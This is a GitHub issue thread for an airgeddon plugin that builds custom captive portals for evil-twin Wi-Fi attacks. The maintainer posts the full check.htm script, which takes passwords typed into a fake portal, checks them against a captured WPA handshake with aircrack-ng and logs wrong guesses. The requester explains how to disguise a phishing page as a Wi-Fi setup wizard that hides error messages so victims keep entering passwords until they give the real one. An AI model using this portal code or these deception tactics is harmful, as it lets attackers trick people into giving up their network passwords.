### ISSUE TITLE
The Custom-Portals plugin should allow the modification of the check.htm file without breaking the password verification 

### ISSUE THREAD

**Issue by minanagehsalalma** [KeyofBlueS/airgeddon-plugins#17]
I want to edit the wrong password error message 

even when providing a check.htm stand alone file it still doesn't get copied

**Comment by KeyofBlueS** [comment]
Done in v0.1.7 of the custom_portals.sh plugin https://github.com/KeyofBlueS/airgeddon-plugins/commit/aad85a1b03df92f396eeb0693c1ac3620259956d

**Comment by minanagehsalalma** [comment]
> Done in v0.1.7 of the custom_portals.sh plugin [aad85a1](https://github.com/KeyofBlueS/airgeddon-plugins/commit/aad85a1b03df92f396eeb0693c1ac3620259956d)

Thanks a lot,  where can i find a check.htm file with all the variables, ready for editing?

As grabbing it from tmp/www
Gets it loaded with already written values😅

Thanks a lot again : )

**Comment by KeyofBlueS** [comment]
In airgeddon.sh at function set_captive_portal_page you can view how the captive portal files are generated, check.htm included.

This is it without setted variables

```

#!/usr/bin/env bash
echo '<!DOCTYPE html>'
echo '<html>'
echo -e '\t<head>'
echo -e '\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>'
echo -e '\t\t<title>${et_misc_texts[${captive_portal_language},15]}</title>'
echo -e '\t\t<link rel="stylesheet" type="text/css" href="${cssfile}"/>'
echo -e '\t\t<script type="text/javascript" src="${jsfile}"></script>'
echo -e '\t</head>'
echo -e '\t<body>'
echo -e '\t\t<div class="content">'
echo -e '\t\t\t<center><p>'

POST_DATA=$(cat /dev/stdin)
if [[ "${REQUEST_METHOD}" = "POST" ]] && [[ ${CONTENT_LENGTH} -gt 0 ]]; then
	POST_DATA=${POST_DATA#*=}
	password=${POST_DATA/+/ }
	password=${password//[*&\/?<>]}
	password=$(printf '%b' "${password//%/\\x}")
	password=${password//[*&\/?<>]}
fi

if [[ ${#password} -ge 8 ]] && [[ ${#password} -le 63 ]]; then

	rm -rf "${tmpdir}${webdir}${currentpassfile}" > /dev/null 2>&1

	echo "${password}" >\

	"${tmpdir}${webdir}${currentpassfile}"
	aircrack-ng -a 2 -b ${bssid} -w "${tmpdir}${webdir}${currentpassfile}" "${et_handshake}" | grep "KEY FOUND!" > /dev/null

	if [ "$?" = "0" ]; then

		touch "${tmpdir}${webdir}${et_successfile}" > /dev/null 2>&1
		echo '${et_misc_texts[${captive_portal_language},18]}'
		et_successful=1
	else

		echo "${password}" >>\

		"${tmpdir}${webdir}${attemptsfile}"
		echo '${et_misc_texts[${captive_portal_language},17]}'
		et_successful=0
	fi

elif [[ ${#password} -gt 0 ]] && [[ ${#password} -lt 8 ]]; then

	echo '${et_misc_texts[${captive_portal_language},26]}'
	et_successful=0
else
	echo '${et_misc_texts[${captive_portal_language},14]}'
	et_successful=0
fi
echo -e '\t\t\t</p></center>'
echo -e '\t\t</div>'
echo -e '\t</body>'
echo '</html>'

if [ ${et_successful} -eq 1 ]; then
	exit 0
else
	echo '<script type="text/javascript">'
	echo -e '\tsetTimeout("redirect()", 3500);'
	echo '</script>'
	exit 1
fi
```

**Comment by minanagehsalalma** [comment]
@KeyofBlueS oh thanks a lot 

can we get the file included in OpenWRT_EXAMPLE ?

**Comment by KeyofBlueS** [comment]
I prefer not, I want to keep this as simple as possible.

**Comment by minanagehsalalma** [comment]
> I prefer not, I want to keep this as simple as possible.

@KeyofBlueS  First are the users going to know that they can do that ? 

second even if they knew , i don't think that they will be able to figure where to get the above code from tho 

third i tested it and it doesn't replace the variables tho , it just copies the file as it's 
![image](https://user-images.githubusercontent.com/20546638/149599568-2802c1ca-aa3f-4553-9bcd-de97de0b47f0.png)

**Comment by minanagehsalalma** [comment]
also i am having trouble trying to add the `ESSID_HERE` variable to phishing templates that look like this 
```
<div class="right">
<input type="text" id="SuffixESSID_0" name="SuffixESSID_0" class="cfgLabel w60" disabled="disabled" readonly="readonly" value="ISP-" style="display: inline;">
<input type="text" id="ESSID_0" name="ESSID_0" class="w128" value="Test">
<span style="display:none;">Length: 1 ~ 32</span>
</div>

```

the ISP part is static 
while the reset isn't 
![image](https://user-images.githubusercontent.com/20546638/149600168-99d3bc08-51da-4a7a-b286-9c436324833b.png)

this how the  `ESSID_HERE` variable is placed in the provided default phishing template 
![image](https://user-images.githubusercontent.com/20546638/149600225-1e058e04-b22f-42bb-b868-75c300058c3e.png)

**Comment by KeyofBlueS** [comment]
This is exactly why I've not allowed the use of a custom check.htm from the beginning...

The variables doesn't get replaced because the file is not "generated", it's simply copied from a directory to the webserver directory.
Look at index.htm and portal.css examples, there are no variables to be set. The only check is for substitute TITLE_HERE and ESSID_HERE in index.htm, that's all. 
The examples are for a generic captive portal. If you want to perform tailored attacks you must do it manually, otherwise the "generic portal style" and especially the standard check.htm is just fine.

Finally, while I'll keep the ability of being able to use a custom check.htm, just in case an experienced user wants to take advantage of it, I will not document it ;)

About the last message, I don't understand what you are asking for, but in any case I don't provide support on how to make a portal :p sorry

**Comment by minanagehsalalma** [comment]
> The variables doesn't get replaced because the file is not "generated", it's simply copied from a directory to the webserver directory.

@KeyofBlueS  but it has variables ... It can't be the same for all networks 
it can't be simply copied 
the variables have to be replaced first 
![image](https://user-images.githubusercontent.com/20546638/149639367-c0695390-0ccf-4cf2-ba2d-b4a07117bfb4.png)
> variables 

......................................................
> The only check is for substitute TITLE_HERE and ESSID_HERE in index.htm, that's all.

was that always the case tho ? 

can't the same be done for this too ? 

also i don't understand why a check.htm file would contain things like this 
`	aircrack-ng -a 2 -b ${bssid} -w "${tmpdir}${webdir}${currentpassfile}" "${et_handshake}" | grep "KEY FOUND!" > /dev/null
`

That doesn't make sense , these should be in another part of code 

> especially the standard check.htm is just fine

I agree 
but the only change i did was that 

from this 
`	echo -e '\tsetTimeout("redirect()", 3500);'
`
to this 
`echo -e '\tredirect();'
`

+ removing the password is incorrect messages 

Cause i am using a Wifi password wizard page , Which is a normal thing that pops up when setuping wifi or something , so they would think that there is a problem with the wifi config that's way they can't connect 
so they config it.
Unlike the suspicious generic page asking for a wifi password in a Webpage which is a something that never happens 

So ... for the wizard page to look normal it shouldn't show password is incorrect messages or etc 

It should accept the password and that's it 
in my case i am making it refresh the page so they will keep inputting and trying passwords , till they enter the correct one 

"the password is correct message" won't matter cause the page will disappear automatically when the Fake AP is turn off 


That's it

**Comment by minanagehsalalma** [comment]
@KeyofBlueS also take a look in this , it's so darn interesting 
[
Windows Lock Screen Senario
](https://github.com/wifiphisher/wifiphisher/pull/1467#issuecomment-1013561035)

**Comment by KeyofBlueS** [comment]
No, it can't be simply copied... before you must edit manually the way you want.

Again, title and essid are not variables. They are there just to make the portals a little bit dynamics.
In a custom portal, being custom, how can I know what should be checked or setted or whatever? It's impossible to cover every use case.

If you want standard check.htm with that modification, you can simply do it by editing the way it is generated in airgeddon.sh or in custom_portal.sh

If you think that code should not be there, remove it and place it where you think it should be.

Also, this is a plugin for airgeddon repository, I'm not interested in anything not related.

**Comment by minanagehsalalma** [comment]
> before you must edit manually the way you want.

@KeyofBlueS  why can't we do it the same way airegddon does it ? 
as this line for ex. isn't the same each time , is it ? 
the variables in it gets replaced automatically
`aircrack-ng -a 2 -b ${bssid} -w "${tmpdir}${webdir}${currentpassfile}" "${et_handshake}" | grep "KEY FOUND!" > /dev/null
`
 

> how can I know what should be checked or setted or whatever? It's impossible to cover every use case.

for the index.htm ... nothing else than what you mentioned 

but for the check.htm only the parts needed for password verification and nothing else

> airgeddon.sh or in custom_portal.sh

So... Just one of them will do?

I can't see the error messages in neither of them

I can only see it in the final generated check.htm.. 

Also if i edited it this way.. That means that it will affect all portals not just this one obviously, right?

**Comment by KeyofBlueS** [comment]
We can't do it because this is how this plugin works, it's not generating the files. As said, I want to keep this as simple as possible, for now at least.

If you use custom_portal.sh you must edit that, because it overrides airgeddon.sh when generating portal files, the code is there, check more carefully.
And yes, it will affect all portals.

**Comment by KeyofBlueS** [comment]
Look... you can do it now. Custom-Portals will now set all original variables in custom portal files.
TITLE_HERE and ESSID_HERE aren't needed anymore, as the original variables will be setted . Look at examples https://github.com/KeyofBlueS/airgeddon-plugins/tree/master/custom_portals

I hope this will not generate confusion to the end user. And hope it will work as expected, as I really don't have time to test it deeply.

**Comment by minanagehsalalma** [comment]
> Look... you can do it now. Custom-Portals will now set all original variables in custom portal files. TITLE_HERE and ESSID_HERE aren't needed anymore, as the original variables will be setted . Look at examples https://github.com/KeyofBlueS/airgeddon-plugins/tree/master/custom_portals
> 
> I hope this will not generate confusion to the end user. And hope it will work as expected, as I really don't have time to test it deeply.

Oh, Thanks a lot mate , it works great 

That's just an amazing work 

I will edit the guide soon.

I suggest that `OpenWRT_EXAMPLE_2` be `OpenWRT_EXAMPLE`

and `OpenWRT_EXAMPLE`  be `OpenWRT_EXAMPLE_2`

I mean just switch them 
That way the one with the check.htm that doesn't get affected by the portal language choice from the menu , doesn't be the first for the users .... so only the ones that know about this will choose the second option which is `OpenWRT_EXAMPLE_2` 

I mean the default first option should be the normal one not the new advanced one
